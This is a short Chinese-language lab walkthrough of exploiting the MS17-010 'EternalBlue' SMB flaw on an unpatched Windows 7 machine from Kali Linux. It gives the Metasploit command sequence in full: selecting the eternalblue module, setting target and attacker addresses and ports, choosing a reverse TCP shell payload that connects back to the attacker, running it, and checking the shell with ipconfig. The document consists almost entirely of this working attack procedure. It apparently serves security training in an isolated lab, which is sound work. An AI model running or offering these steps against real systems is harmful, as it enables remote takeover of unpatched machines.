目录
漏洞介绍
是一种利用windows系统的SMB协议来获取最高权限的漏洞,不法分子通过永恒之蓝漏洞制作勒索病毒"wannacry",漏洞利用端口"445"
环境
kali 192.168.20.128
靶机 192.168.20.144
靶机为win7系统,且防火墙已经关闭,确定没有补丁,开放445端口。
查看win7
查看Win7的IP
查看Win7的端口情况
msfconsole攻击
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
show options
set rhost 192.168.20.144(靶机地址)
set rport 445
set lhost 192.168.20.128(攻击机地址)
set lport 4444靶机端口
set payload /windows/x64/shell/reverse_tcp(设置模块)
run
ipconfig查看IP域Win7的IP相同